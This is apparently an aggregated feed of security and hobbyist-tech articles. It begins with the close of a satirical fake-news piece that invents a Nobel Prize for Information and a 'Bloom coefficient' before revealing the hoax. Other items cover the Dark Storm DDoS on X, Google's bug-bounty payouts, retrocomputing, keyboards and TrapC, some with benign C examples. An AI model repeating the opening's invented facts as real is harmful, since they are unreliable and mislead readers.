On one side, Artificial Intelligence must be regulated by legally requiring corrective ethical parameters that favour true news and penalise fake news. This intervention cannot, however, be called sufficient, which is why the studies of Smith, awarded the Nobel Prize for Information in 1984, were cited: they demonstrated a correlation between a rising Bloom coefficient and a decline in authors who choose to publish under their own name, opting instead for a pseudonym or anonymity.
Smith’s projection of the correlation between the rise in the Bloom coefficient and the decline in identifiable authors over time.
This should prompt reflection: with modern technologies and social networks, how much more alarming would Smith’s projection be if it were updated? This is why online anonymity, especially on social networks, must be reduced to the bare minimum (e.g. only for law enforcement, moderators or the platform’s official fact-checkers). In any case, access must require state-issued authentication (e.g. via SPID).

Otherwise it will never be possible to guarantee a healthy and safe social ecosystem. Above all for minors, the first to be endangered by online anonymity.

Hence the confirmed need for urgent regulatory intervention. Harsh penalties for those who spread fake news produced with Artificial Intelligence will not be enough on their own: those who register on a social network under a false name must be punished too, since that is the precondition for every illicit activity carried out on the platform.

Conclusions: fake news and the role of the reader


What conclusions can be drawn?

That everything you have read up to this point is fake news!

And come to think of it: re-read the title and it now takes on a whole different meaning, doesn’t it?

Moreover, the role of whoever reads the news is fundamental! And it must remain so, because only the person who approaches the news is the indispensable fact-checker who freely applies their own critical thinking, searches for sources, interprets data and evaluates both substance and method. And reads an article all the way through, getting this far. Where I reveal the trick and the game.

An attentive reader could easily have spotted all the inconsistencies in the article, as well as the lack of verifiable sources: a project whose report is never cited or linked, a ‘coefficient’ defined only by its alarming numbers, a Nobel category that does not exist, and a proposal whose cost is never stated. This was nothing more than a practical demonstration of how a fake news story can be engineered on a particularly sensitive topic. Like fake news itself, as it happens. With a sprinkling of Artificial Intelligence, which is fashionable. And unproven hatred of online anonymity, which on the contrary is a safeguard of freedom, recognised among the fundamental rights of the Internet (Italian ‘Declaration of Internet Rights’, Article 10).

A fake news story must indeed be enticing, tickle assorted cognitive biases, take on an air of authority and present who knows what unproven objective facts, carefully selected wording, and so on. All well-known ingredients that lead people to pass it on, by leveraging emotion and counting on diminished critical thinking.

The cocktail is thus a mix of indignation, a sense of danger and everything we want to believe in order to adopt easy solutions, which, as it happens, are conveniently on offer. Without, of course, stating their cost, which is often the compression of fundamental rights and freedoms. However intoxicating in the moment, it gives easy illusions and a terrible awakening. Which always makes for experience, better still if approached as a lesson learned.

Trusting that the nerd references made the deception more enjoyable (or rather: happy easter-egg hunting!), I take my leave with the words of the Bard:

If we shadows have offended,
Think but this, and all is mended,
That you have but slumber’d here
While these visions did appear.
And this weak and idle theme,
No more yielding but a dream,
Gentles, do not reprehend:
If you pardon, we will mend:

And, as I am an honest Puck,
If we have unearned luck
Now to ’scape the serpent’s tongue,
We will make amends ere long;
Else the Puck a liar call;
So, good night unto you all.
Give me your hands, if we be friends,
And Robin shall restore amends.


The article Fake news: international study reveals it’s all the fault of AI and online anonymity comes from il blog della sicurezza informatica.


Attack on X: Has the Culprit Been Found? The Investigations Point in an Unexpected Direction!


The cyber attack on X, Elon Musk’s social network, has triggered a veritable hunt for those responsible. After Musk’s own statements attributing the attack to Ukrainian sources, the event has taken on a significant geopolitical dimension, especially considering the recent meeting between President Volodymyr Zelensky and Donald Trump.
The Dark Storm team’s profile on X

The attack and its consequences


The DDoS attack, attributed to the group known as “Dark Storm”, caused significant outages on the X platform, with intermittent disruption for several hours. According to some cybersecurity experts, the timing of the attack may not be coincidental, coming shortly after the meeting between Zelensky and Trump, an event that may have influenced the strategy of cyber-related actors.

The hunt for those responsible


After the attack, the OSINT (Open Source Intelligence) community and various independent researchers began investigating the identity of the actors behind Dark Storm. A user going by “lulagain”, active on dark web forums, published an alleged leak with information on one of the group’s members, including images and links to X profiles.

One of the most notable posts appeared on X from the researcher Baptiste Robert (@fs0c131y), who claimed to have identified those responsible for the attack and to be available to discuss the matter directly with Elon Musk in Washington.

The OSINT analysis reportedly led to the identification of a possible member of the group, whose images were circulated on underground forums and social media.
Post on BreachForums surfacing the tweet by @fs0c131y

The political and security implications


The attack has raised questions about the security of the X platform and its vulnerability to cyber threats. Moreover, the hypothesis of Ukrainian involvement suggested by Musk has sparked debate about the real motives behind Dark Storm’s action. Is it an independent group, or an operation orchestrated in a broader cyber-warfare context? One caveat applies to any geographic attribution of a DDoS: the source addresses identify the compromised machines generating the traffic, not whoever directs them, so where the bots sit says little about where the operator is.

Investigations continue, and if the OSINT analyses prove correct, we may soon see further developments on the real identity of the hackers behind Dark Storm and their connections with state or private actors. Meanwhile, the security of X remains under scrutiny, and the case continues to be debated by the public and by industry experts.
Tweet by @fs0c131y showing the person identified by OSINT analysis as being behind the attack on X

Conclusions


The DDoS attack conducted by Dark Storm against X is a clear example of how hacktivists use publicly accessible tools, such as Check-host.net, to demonstrate the effectiveness of their operations. The publication of evidence on Telegram and Breach Forums highlights an established modus operandi: hit high-profile targets and publicly claim the actions to gain visibility and approval within their communities of reference.

X’s response, enabling Cloudflare protection to mitigate the impact of the attacks, shows how digital platforms are adopting increasingly sophisticated measures to defend against cyber threats. Introducing a captcha system to filter suspicious traffic is an immediate and effective countermeasure, but it raises questions about the scalability and usability of the platform for legitimate users.
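Since the piece talks about filtering suspicious traffic with a captcha, here is what the decision behind such a filter looks like at its simplest. This is an added example written for this page, not code from X, Cloudflare or Dark Storm: a fixed-window per-client rate check run over a handful of constructed log lines (documentation IP ranges, not real traffic). The log format, the ten-second window and the threshold of five requests are all assumed for the illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample access-log lines, "<epoch> <client-ip> <path>".
   Not traffic from the incident above; 203.0.113.0/24 and 198.51.100.0/24
   are documentation ranges. */
static const char *SAMPLE_LOG[] = {
    "1741600000 203.0.113.7 /home",
    "1741600000 203.0.113.7 /home",
    "1741600001 203.0.113.7 /home",
    "1741600001 198.51.100.2 /i/status/1",
    "1741600001 203.0.113.7 /home",
    "1741600002 203.0.113.7 /home",
    "1741600002 203.0.113.7 /home",
    "1741600003 198.51.100.2 /i/status/2",
    "1741600040 203.0.113.7 /home",          /* 40 s later: a new window */
    "this line is garbage and must be skipped",
};
#define SAMPLE_LOG_LEN (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

#define MAX_CLIENTS 64
#define MAX_IP      40          /* room for a textual IPv6 address */

typedef struct {
    char ip[MAX_IP];
    long window_start;          /* epoch second the current window began */
    int  count;                 /* requests seen in that window */
    int  flagged;               /* set once count passes the threshold */
} client_t;

static client_t *lookup(client_t *table, int *n, const char *ip)
{
    for (int i = 0; i < *n; i++)
        if (strcmp(table[i].ip, ip) == 0)
            return &table[i];
    if (*n >= MAX_CLIENTS)
        return NULL;            /* table full; a real edge evicts least-recently-seen */
    client_t *c = &table[(*n)++];
    memset(c, 0, sizeof *c);
    snprintf(c->ip, sizeof c->ip, "%s", ip);
    c->window_start = -1;
    return c;
}

/* Fixed-window rate check. A client sending more than `threshold` requests
   inside one `window_secs` window is flagged, i.e. would be sent a challenge
   (captcha) instead of the page. Returns how many distinct clients were
   flagged and copies the first one's address into `first_flagged`. */
int detect_flooders(const char **lines, size_t nlines, int window_secs,
                    int threshold, char *first_flagged, size_t outsz)
{
    client_t table[MAX_CLIENTS];
    int nclients = 0, nflagged = 0;
    if (outsz)
        first_flagged[0] = '\0';

    for (size_t i = 0; i < nlines; i++) {
        long ts;
        char ip[MAX_IP], path[256];
        /* field widths keep the parse bounded on hostile input */
        if (sscanf(lines[i], "%ld %39s %255s", &ts, ip, path) != 3)
            continue;           /* malformed line: skip it, never crash on it */
        client_t *c = lookup(table, &nclients, ip);
        if (c == NULL)
            continue;
        if (c->window_start < 0 || ts - c->window_start >= window_secs) {
            c->window_start = ts;
            c->count = 0;
        }
        if (++c->count > threshold && !c->flagged) {
            c->flagged = 1;
            if (nflagged == 0 && outsz)
                snprintf(first_flagged, outsz, "%s", ip);
            nflagged++;
        }
    }
    return nflagged;
}

int main(void)
{
    char ip[MAX_IP];
    int n = detect_flooders(SAMPLE_LOG, SAMPLE_LOG_LEN, 10, 5, ip, sizeof ip);
    printf("%d client(s) over threshold%s%s\n", n, n ? ", first: " : "", n ? ip : "");
    return 0;
}
```

Anything flagged would be diverted to a challenge page rather than served. Two caveats a practitioner would add: a botnet spreads its load across many addresses, each of which can stay under any per-IP threshold, so platforms also score on ASN, TLS fingerprint and behaviour; and a fixed window lets a client burst twice the threshold across a window boundary, which a sliding window or token bucket avoids.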

This episode once again underlines the growing importance of cybersecurity in today’s digital landscape. DDoS attacks, increasingly used as a tool of political protest and destabilisation, require technology companies to keep evolving their defensive strategies. The Dark Storm vs X case is just one more demonstration that the cyber war between hacktivists and major platforms is set to continue, with new tactics and countermeasures in constant development.

The article Attack on X: Has the Culprit Been Found? The Investigations Point in an Unexpected Direction! comes from il blog della sicurezza informatica.


$11.8 Million Is the Record Sum Google Pays to Bug Hunters: Here’s Who Earned the Most!


Google has announced that it paid $11.8 million in rewards to 660 security researchers in 2024 for the vulnerabilities they discovered.

According to the company, since the launch of its first Vulnerability Reward Program (VRP) in 2010, Google has paid out more than $65 million in bug bounties to researchers.

Last year Google revised its reward scheme, offering researchers up to $151,515 under the Google VRP and Cloud VRP, up to $300,000 under the Mobile VRP, and up to $250,000 for critical vulnerabilities in the Chrome browser.

As a result, in 2024 the researchers who reported vulnerabilities in Android and Google’s mobile apps received $3.3 million, and the number of critical and high-severity reports rose even as the overall number of bugs fell.

A further 137 researchers who reported issues in Chrome received rewards totalling $3.4 million. The highest single reward was $100,115, paid for a MiraclePtr bypass. Notably, in August last year Google raised the reward for bypassing MiraclePtr to $250,128.

Furthermore, since the launch of the Cloud VRP bug bounty programme in October 2024, the company has received more than 400 vulnerability reports and paid researchers over $500,000. The company paid more than $290,000 for issues reported through the Abuse VRP.

Under its bug bounty programme for flaws in artificial intelligence, the company received more than 150 reports from specialists and ultimately paid them more than $55,000 in rewards.

Another $370,000 went on incentives for two bugSWAT events. Bug hunters who took part in the competition to find problems in LLM products received more than $87,000.

The article $11.8 Million Is the Record Sum Google Pays to Bug Hunters: Here’s Who Earned the Most! comes from il blog della sicurezza informatica.


Classy Paper Tape Reader Complements Homebrew Retrocomputer


If you were one of the earliest of early adopters in the home computing revolution, you might have had to settle for paper tape mass storage. It was slow, it was bulky, but it was what you had, and that gave it a certain charm that’s hard to resist. And that charm is what [Joshua Coleman] captures with this DIY paper tape reader build.

If the overall style of this project looks familiar, it’s because it was meant to echo the design themes from [Joshua]’s Coleman Z-80 modular computer. The electronics of the reader are based on [David Hansel]’s take on a paper tape reader, which in turn was meant to complement his Altair 8080 simulator — it’s retrocomputers all the way down! [Joshua]’s build has a few bells and whistles to set it apart, though, including an adjustable read head, parametric 3D-printed reels, and a panel mounted ammeter, just because. He also set it up to be a sort of keyboard wedge thanks to an internal relay that bypasses the reader unless it’s actually playing back a tape. Playback speed is pretty fast; see the video below for details.

So far, writing the tapes is an offline process. [Joshua] uses a Python program to convert ASCII to an SVG file and uses a laser cutter to burn holes in lengths of paper, which are then connected together to form a longer tape. A logical next step might be to build a feeder that moves a paper tape across the bed of the laser cutter in sync with the conversion program, to create continuous paper tapes. Or, there’s always the old-school route of solenoid-powered punch and die. We’d be thrilled with either.
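To make the ASCII-to-SVG step concrete, here is an added example in C, written for this page rather than taken from [Joshua]’s program, that does the same job for 8-level tape: each character becomes one row, each set bit a hole on its track, and every row gets the smaller feed hole between tracks 3 and 4. The dimensions are nominal ECMA-10 style figures assumed for the illustration, so check them against your reader before cutting.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Nominal 8-level tape geometry (assumed, ECMA-10 style figures): 25.4 mm
   wide tape, 2.54 mm pitch along and across the tape, eight data tracks plus
   the smaller feed (sprocket) hole sitting between track 3 and track 4. */
#define ROW_PITCH_MM    2.54
#define TRACK_PITCH_MM  2.54
#define TAPE_WIDTH_MM   25.4
#define DATA_HOLE_D_MM  1.83
#define FEED_HOLE_D_MM  1.17
#define EDGE_MARGIN_MM  ((TAPE_WIDTH_MM - 8 * TRACK_PITCH_MM) / 2)   /* 2.54 */

/* Track t (0 = least significant bit, 7 = most) of byte c is punched iff that
   bit is set. Plain 7-bit ASCII never punches track 7 unless you add parity. */
int hole_present(unsigned char c, int track)
{
    return (c >> track) & 1;
}

/* Distance of a hole centre from the reference edge. Tracks 0..2 come first,
   then the feed hole (track -1), then tracks 3..7, all on one pitch. */
double track_y(int track)
{
    int slot = (track < 0) ? 3 : (track < 3 ? track : track + 1);
    return EDGE_MARGIN_MM + slot * TRACK_PITCH_MM;
}

/* Bounded append into the output buffer; refuses rather than truncates. */
static int append(char *out, size_t outsz, size_t *used, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int w = vsnprintf(out + *used, outsz - *used, fmt, ap);
    va_end(ap);
    if (w < 0 || (size_t)w >= outsz - *used)
        return 0;
    *used += (size_t)w;
    return 1;
}

/* Renders text as one SVG (millimetre units, one hole per set bit) into out.
   Returns the number of rows emitted, or -1 if out is too small. */
int ascii_to_tape_svg(const char *text, char *out, size_t outsz)
{
    size_t used = 0, n = strlen(text);
    double length = (double)(n + 1) * ROW_PITCH_MM;
    if (!append(out, outsz, &used,
                "<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"%.2fmm\" "
                "height=\"%.2fmm\" viewBox=\"0 0 %.2f %.2f\">\n"
                "<rect width=\"%.2f\" height=\"%.2f\" fill=\"none\" stroke=\"black\"/>\n",
                length, TAPE_WIDTH_MM, length, TAPE_WIDTH_MM, length, TAPE_WIDTH_MM))
        return -1;
    for (size_t i = 0; i < n; i++) {
        double x = (double)(i + 1) * ROW_PITCH_MM;
        /* the feed hole appears on every row, data holes only where bits are set */
        if (!append(out, outsz, &used, "<circle cx=\"%.2f\" cy=\"%.2f\" r=\"%.3f\"/>\n",
                    x, track_y(-1), FEED_HOLE_D_MM / 2))
            return -1;
        for (int t = 0; t < 8; t++)
            if (hole_present((unsigned char)text[i], t) &&
                !append(out, outsz, &used, "<circle cx=\"%.2f\" cy=\"%.2f\" r=\"%.3f\"/>\n",
                        x, track_y(t), DATA_HOLE_D_MM / 2))
                return -1;
    }
    return append(out, outsz, &used, "</svg>\n") ? (int)n : -1;
}

int main(int argc, char **argv)
{
    static char svg[1 << 16];
    const char *text = argc > 1 ? argv[1] : "HELLO, WORLD";
    if (ascii_to_tape_svg(text, svg, sizeof svg) < 0) {
        fprintf(stderr, "output buffer too small\n");
        return 1;
    }
    fputs(svg, stdout);
    return 0;
}
```

Pipe the output into a file and the laser cutter’s software will see one circle per hole; the rows run along the x axis, so a long message just makes a long, thin SVG.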

youtube.com/embed/FqEwnl9ZPYk?…


hackaday.com/2025/03/11/classy…


Lies, Damned Lies, And IGBT Datasheets


We have all seen optimistic claims for electronic products which fail to match the reality, and [Electronic Wizard] is following one up in a recent video. Can a relatively small IGBT really switch 200 A as claimed by a dubious seller? Off to the datasheet to find out!

The device in question is from Toshiba, and comes in a TO-220 package. That alone gives us pause, because we suspect the pins on a TO-220 would act more like fuses at a steady 200 A.

But in the datasheet, there it is: 200 A. Which would be great, except it turns out that this is the instantaneous maximum current, for a pulse a few microseconds long. Even then it’s not over, because while the continuous current is supposed to be half that, the datasheet specifies it at a junction temperature of 25 Celsius. The cooling rig required to hold that with this transistor passing 100 A would, we think, be a sight to behold, so for all intents and purposes this can’t even switch a continuous 100 A. The real figure is much less, as you’d imagine, but it raises an important point. We blindly read datasheets and trust them, but sometimes we should engage brain before releasing the magic smoke.

youtube.com/embed/sIabnsGmGBY?…


hackaday.com/2025/03/11/lies-d…


How To Use LLMs For Programming Tasks


[Simon Willison] has put together a list of how, exactly, one goes about using a large language models (LLM) to help write code. If you have wondered just what the workflow and techniques look like, give it a read. It’s full of examples, strategies, and useful tips for effectively using AI assistants like ChatGPT, Claude, and others to do useful programming work.

It’s a very practical document, with [Simon] emphasizing realistic expectations and the importance of managing context (both in terms of giving the LLM direction, as well as the model’s context in terms of being mindful of how much the LLM can fit in its ‘head’ at once.) It is useful to picture an LLM as a capable and obedient but over-confident programming intern or assistant, albeit one that never gets bored or annoyed. Useful work can be done, but testing is crucial and human oversight simply cannot be automated away.

Even if one has no interest in using LLMs to help in writing production code, there’s still a lot of useful work they can do to speed up the process of software development in general, especially when learning. They can help research options, interactively explore unfamiliar codebases, or prototype ideas quickly. [Simon] provides useful strategies for all these, and more.

If you have wondered how exactly glorified chatbots can meaningfully help with software development, [Simon]’s writeup hopefully gives you some new ideas. And if this is all leaving you curious about how exactly LLMs work, in the time it takes to enjoy a warm coffee you can learn how they do what they do, no math required.


hackaday.com/2025/03/11/how-to…


A Magic Eye Tube Does All The Work In This Kit


We’re used to low cost parts and a diversity of electronic functions to choose from in our projects, to the extent that our antecedents would be green with envy. Back when tubes were king, electronics was a much more expensive pursuit with new parts, so designers had to be much more clever in their work. [Thomas Scherrer OZ2CPU] has just such a design on his bench, it’s a Heathkit Capaci-Tester designed in 1959, and we love it for the clever tricks it uses.

It’s typical of Heathkits of this era, with a sturdy chassis and components mounted on tag strips. As the name suggests, it’s a capacitor tester, and it uses a magic eye tube as its display. It’s looking for short circuits, open circuits, and low equivalent resistance, and it achieves this by looking at the loading the device under test places on a 19 MHz oscillator. But here comes that economy of parts; there’s no rectifier so the circuit runs on an AC HT voltage from a transformer, and that magic eye tube performs the task of oscillator as well as display.

He finds it to be in good condition in the video below the break, though he removes a capacitor placed from one of the mains input lines to chassis. It runs, and confirms his test capacitor is still good. It can’t measure the capacitance, but we’re guessing the resourceful engineer would also have constructed a bridge for that.

youtube.com/embed/fctP5mRQldE?…


hackaday.com/2025/03/11/a-magi…


A Deep Dive Into Canon Autofocus Lenses


Canon Arc Form Drive, exploded view. Credit: Markus Kohlpaintner
Although taken for granted these days, autofocus (AF) used to be a premium feature on film and digital cameras, and [Markus Kohlpaintner] takes us through an exhaustive overview of Canon’s AF systems and how they work. On Canon cameras AF became a standard feature with the introduction of its EF lenses in 1987, which are found on its EOS SLR (single-lens reflex) series of professional and prosumer cameras.

Over the decades, Canon has used many different AF drive mechanisms within these lenses, all with their own pros and cons. The article goes through each of them, starting with the original Arc-Form Drive (AFD) and ending with the newest Voice Coil Motor (VCM), showing their internal construction. Of note are the USM (ultrasonic motor) types of AF system that use a piezoelectric motor; how these work, using a travelling wave across the stator, is also detailed, including the integrated feedback control system.

Ultimately the end user is mostly concerned with how well the AF works, of course. Here the biggest difference is probably whether manual adjustment is possible, with not all AF systems supporting full-time manual adjustment. With the newer AF systems this manual adjustment is now performed digitally rather than with a direct coupling. Although few people probably give AF much thought, it’s fascinating to see how much engineering went into these complex systems before even touching upon the algorithms that decide what to focus on in a scene.


hackaday.com/2025/03/11/a-deep…


Keebin’ with Kristina: the One with the Batwing Typewriter


Illustrated Kristina with an IBM Model M keyboard floating between her hands.

[Alex] of YouTube channel [EastMakes] wrote in to tell me about his fantastic QWERTY ‘hexpansion’ board for the 2024 EMF Tildagon badge, and [Alex], I’m super glad you did. The system works!

Let’s back up a bit. Essentially, the idea is to have a badge that can be used beyond a single camp, with the creation of expansion boards being the other main attraction. Our own [Jenny List] covered the badge in detail back in June 2024 when she got her hands on one.

A pair of hands holds the 2024 EMF Tildagon badge with a QWERTY keyboard hexpansion built by [EastMakes]. Image by [EastMakes] via YouTube
[Alex] started by importing the Tildagon into Fusion 360 and designing a way for the keyboard to attach to it physically. He then modelled the keyboard after the BlackBerry-style ones that can be found on Ali, using the official EMF buttons established in earlier badges.

This QWERTY hexpansion is based on the RP2040, which is soldered around back and visible through the 3D-printed backplate. In order for the 90°-oriented board to align with the… not-90° connector, [Alex] built a little meander into the PCB.

The default OS on the Tildagon doesn’t know natively what to do with the serial messages from the keyboard, so [Alex] wrote an application that reads them in and decodes them. Be sure to check out the build and walk-through video after the break.

youtube.com/embed/5mLt09UtY2E?…

More, Children, Is Just a Slot Away


[New-Concentrate6308] is cooking up something new in the form of a 50% keyboard with a cartridge slot! The custom layout has been dubbed Esul, and has the Esc to the left of Tab, among other interesting features.

A custom keyboard with a cartridge system! Image by [New-Concentrate6308] via reddit
Inspired by [mujimanic]’s giga 40, the cartridges add modules to the keyboard. If you want a screen, just slot one in. You could also up the RGB, or add something useful like a knob, or even some more keys.

You may have noticed the lack of an up arrow key. It’s there, it’s just a tap away on the right Shift, which becomes Shift again when held down.

This thing is not going to be for everyone, but that’s not the point. (Is it ever?) The point is that [New-Concentrate6308] wanted a fun keyboard project and found it in spades. Plus, it looks fantastic.

The Centerfold: At the Corner of Practical and Paradise


A lovely corner desk setup with a lake and mountains out the windows. Image by [jamesvyn] via reddit
Do I really need to say anything here? Can we all just enjoy the beauty of Switzerland for a moment?

[jamesvyn] recently switched from two monitors to a wide boi and is loving every minute of it. I particularly like the base — something about that shape is quite pleasing.

I bet it was difficult to find a wallpaper that does the view any justice. I have almost no details here, but I can tell you that the pager-looking thing near the mouse is a Pomodoro timer. And that’s an interesting wrist rest block-thing. Not sure I could use that for an extended period of time. Could you?

Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!

Historical Clackers: the Oliver


Today, we can not only see what we type as we type it, we can do things like correct entire words with a simple key combination (Ctrl + Backspace).
An Oliver No. 2 machine, with its iconic bat-wing typebars. Image via The Antikey Chop
In the late 1800s, though, seeing what you were typing as well as we do now was a pipe dream until the Oliver typewriter came along. It is thought that inventor Rev. Thomas Oliver sought to create a machine that would make his sermons more legible.

Oliver typewriters were quite distinct with their three-row keyboards and so-called ‘batwing’ typebar arrangement. This style, in which the typebars struck the platen downward instead of upward, made it a partially visible typewriter. Since it would be years until the fully visible Underwoods and Royals came along, this made the Oliver quite the sought-after machine.

Unfortunately, this three-row design did not stay in vogue. As the four-row, single-Shift layout became standard, the writing was on the wall for the Oliver. Adding a fourth row of keys would have meant even taller batwings and an even heavier machine.

Some Oliver models were re-badged for foreign markets and carried names such as Courier, Stolzenberg, Jwic, Fiver, and Revilo. Stateside, the No. 2 was rebranded by Sears & Roebuck as the Woodstock.

Finally, the Clicks Keyboard Case Comes to Android


Do you miss your Blackberry or Sidekick? I miss my Palm Centro’s bubble-poppy keyboard, and I’d love to have a Sidekick or something comparable today. Or like, anything with a keyboard.

A person holds out an Android phone with a Clicks keyboard case in neon yellow with purple keys. Image by [Clicks] via New Atlas
If you don’t mind having an even bigger phone, then the dream is alive in the form of the Clicks keyboard case, which has finally made its way to Android phones, beginning with the Google Pixel 9 and 9 Pro.

The Android Clicks cases will be even better than those created for the iPhone, with upgrades like larger, backlit, domed metal keys, a flexible TPU shell, and a felt lining to protect the phone. Also, there will be Qi wireless charging right through the case, which will accept magnetic accessories as well.

While cases for the Pixel 9s are available for pre-order at $99, there is also the option to reserve Clicks for the 2024 Motorola razr as well as the Samsung Galaxy S25. Check out the overview video if you want to know more, and you can also see it in action on the aforementioned phones.

Or — hear me out — we could just get devices with physical keyboards again. There’s obviously a demand. Your move, manufacturers.


Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.


hackaday.com/2025/03/11/keebin…


Tiny Laptop Gets a New Case and an Unlocking


Unless you’ve got an especially small lap, calling the Toshiba Libretto a laptop is a bit of a stretch. The diminutive computers from the mid-1990s had a lot of the usual laptop features, but in an especially compact and portable case that made them a great choice for anyone with an on-the-go lifestyle.

Fast-forward thirty years or so, and the remaining Librettos haven’t fared too well. Many of them have cases that crumble at the slightest touch, which is what led [polymatt] to undertake this meticulous case replacement. The effort started with a complete teardown; luckily, the lower aluminum-alloy shell was in fine shape, but the upper case parts were found to be almost too deteriorated to handle. Still, with a little patience and the judicious application of tape, [polymatt] was able to scan the case pieces on a flatbed scanner and import them into his CAD package. Great tip on the blue-tack for leveling the parts for accurate scanning, by the way.

After multiple rounds of printing and tweaking, [polymatt] had a case good enough to reassemble the Libretto. Unfortunately, the previous owner left an unwanted gift: a BIOS password. Disconnecting the CMOS battery didn’t reset it, but a little research told him that shorting a few pins on the parallel port on the machine’s dock should do the trick. It was a bit involved, requiring the design and subsequent bodging of a PCB to fit into the docking port connector, but in the end he was able to wake up a machine to all its Windows 95 glory. Better get patching.

In a time when laptops were more like lap-crushers, the Libretto was an amazing little machine, and thirty years on, they’re well worth saving from the scrap heap. Hats off to [polymatt] for the effort to save this beauty, and if he needs tips on reading data from any PCMCIA cards that may have come with it, we’ve got him covered.

youtube.com/embed/AdeswJreJ98?…


hackaday.com/2025/03/11/tiny-l…


TrapC: A C Extension For the Memory Safety Boogeyman


In the world of programming languages it often feels like being stuck in a Groundhog Day-esque loop through purgatory: effectively the same problems are solved over and over, previous solutions are forgotten, and there’s always that one jubilant inventor stumbling out of a darkened basement with the One True Solution™ to everything that plagues this world beset by the Unspeakable Horror that is the C programming language.

As the latest entry to pledge its fealty at the altar of the Church of the Holy Memory Safety, TrapC promises to fix C, while also lambasting Rust for allowing that terrible unsafe keyword. Of course, since this is yet another loop through purgatory, the entire idea that the problem is C and some perceived issue with this nebulous ‘memory safety’ is still a red herring, as pointed out previously.

In other words, it’s time for a fun trip back to the 1970s, when many of the same arguments were already being rehashed, before the early 1980s saw the Steelman language requirements condensed by renowned experts into the Ada programming language. As it turns out, memory safety is a minuscule part of a well-written program.

It’s A Trap


Pretty much the entire raison d’être for new programming languages like TrapC, Rust, Zig, and kin is this fixation on ‘memory safety’, with the idea being that the problem with C is that it doesn’t check memory boundaries and allows usage of memory addresses in ways that can lead to Bad Things. Which is not to say that such events aren’t bad, but because they are so obvious, they are also very easy to detect both using static and dynamic analysis tools.

As a ‘proposed C-language extension’, TrapC would add:

  • memory-safe pointers.
  • constructors & destructors.
  • the trap and alias keywords.
  • Run-Time Type Information.

It would also remove:

  • the goto and union keywords.

The author, Robin Rowe, freely admits to this extension being ‘C++ like’, which takes us right back to 1979, when a then young Danish computer scientist (Bjarne Stroustrup) created a C-language extension first called ‘C with Classes’ and, from 1983, cheekily renamed ‘C++’ to denote it as incremented C. C++ adds many features from Simula, the language generally considered the first object-oriented (OO) programming language and an indirect descendant of ALGOL. These OO features include constructors and destructors. Together with (optional) smart pointers and the bounds-checked strings and containers of the Standard Template Library (STL), C++ thus offers a memory-safe way of working, as long as the raw-pointer and C-array escape hatches are left alone.

So what is the point of removing keywords like goto and union? The former is pretty much the most controversial keyword in the history of programming languages, even though it maps almost directly onto jumps in assembly language. The Ada programming language also has a goto keyword, where it is often used to provide flexibility in places where restrictive language choices would otherwise lead to convoluted loop constructs, to the point where some C-isms, like the continue keyword, do not exist in Ada.

The union keyword is similarly removed in TrapC, with the justification that both keywords are ‘unsafe’ and ‘widely deprecated’. Which makes one wonder how much real-life C and C++ code has been analysed to reach that conclusion. In embedded and driver programming in particular, with its low-level memory (and register) access, union is widely used for the flexibility it offers.

Of course, if you’re doing low-level memory access you’re also free to use whatever pointer offsets and type casts you require, together with the very unsafe, but efficient, memcpy() and similar operations. There is a reason why C++ doesn’t forbid guardrail-free low-level access: sometimes it’s necessary, and you’re expected to know what you’re doing. This freedom to choose between strict memory safety and the untamed wilds of C is a deliberate design choice in C++.
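As an added illustration of the union idiom defended above (example code written for this page, not from TrapC’s whitepaper or any real driver), here is a hypothetical control register accessed both ways: through a union of the raw word and a bit-field struct, and through explicit shifts and masks, plus memcpy used for what it is actually good at. The register layout is invented for the example; the self-check at the end is the caveat that goes with the idiom, since the C standard leaves bit-field packing order to the implementation.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical peripheral control register, invented for this example (it is
   not any real device's layout):
     bit  0      ENABLE
     bits 1..3   MODE
     bits 4..15  PRESCALER
     bits 16..31 reserved, write as zero */
typedef union {
    uint32_t raw;                   /* the word actually read/written on the bus */
    struct {
        uint32_t enable    : 1;
        uint32_t mode      : 3;
        uint32_t prescaler : 12;
        uint32_t reserved  : 16;
    } f;
} ctrl_reg_t;

/* The idiom TrapC would take away: fill in the bit-field view, take the raw
   word. Compact and readable, but C leaves the allocation order of bit-fields
   to the implementation (C11 6.7.2.1), so it is only portable within one ABI. */
uint32_t ctrl_pack_union(unsigned enable, unsigned mode, unsigned prescaler)
{
    ctrl_reg_t r;
    r.raw = 0;
    r.f.enable    = enable & 0x1u;
    r.f.mode      = mode & 0x7u;
    r.f.prescaler = prescaler & 0xFFFu;
    return r.raw;
}

/* The same word built with explicit shifts and masks: the layout is written
   down in the code, so it is portable and auditable. */
#define CTRL_ENABLE_POS  0u
#define CTRL_MODE_POS    1u
#define CTRL_MODE_MASK   0x7u
#define CTRL_PRESC_POS   4u
#define CTRL_PRESC_MASK  0xFFFu

uint32_t ctrl_pack_masks(unsigned enable, unsigned mode, unsigned prescaler)
{
    return ((uint32_t)(enable & 1u) << CTRL_ENABLE_POS)
         | ((uint32_t)(mode & CTRL_MODE_MASK) << CTRL_MODE_POS)
         | ((uint32_t)(prescaler & CTRL_PRESC_MASK) << CTRL_PRESC_POS);
}

unsigned ctrl_prescaler(uint32_t raw)
{
    return (raw >> CTRL_PRESC_POS) & CTRL_PRESC_MASK;
}

/* memcpy as the sanctioned way to reinterpret bytes (no misaligned access, no
   strict-aliasing violation). The bounds are the caller's responsibility, which
   is exactly the "you are expected to know what you're doing" part. */
void word_to_bytes(uint32_t w, unsigned char out[4])
{
    memcpy(out, &w, sizeof w);      /* host byte order */
}

uint32_t word_from_bytes(const unsigned char in[4])
{
    uint32_t w;
    memcpy(&w, in, sizeof w);
    return w;
}

/* Self-check for this toolchain: does the bit-field view agree with the
   documented mask layout? Cheap to run once at start-up on a new compiler. */
int ctrl_union_layout_ok(void)
{
    return ctrl_pack_union(1, 5, 0xABC) == ctrl_pack_masks(1, 5, 0xABC);
}

int main(void)
{
    printf("ctrl = 0x%08X, bit-field layout %s the mask layout\n",
           (unsigned)ctrl_pack_masks(1, 5, 0xABC),
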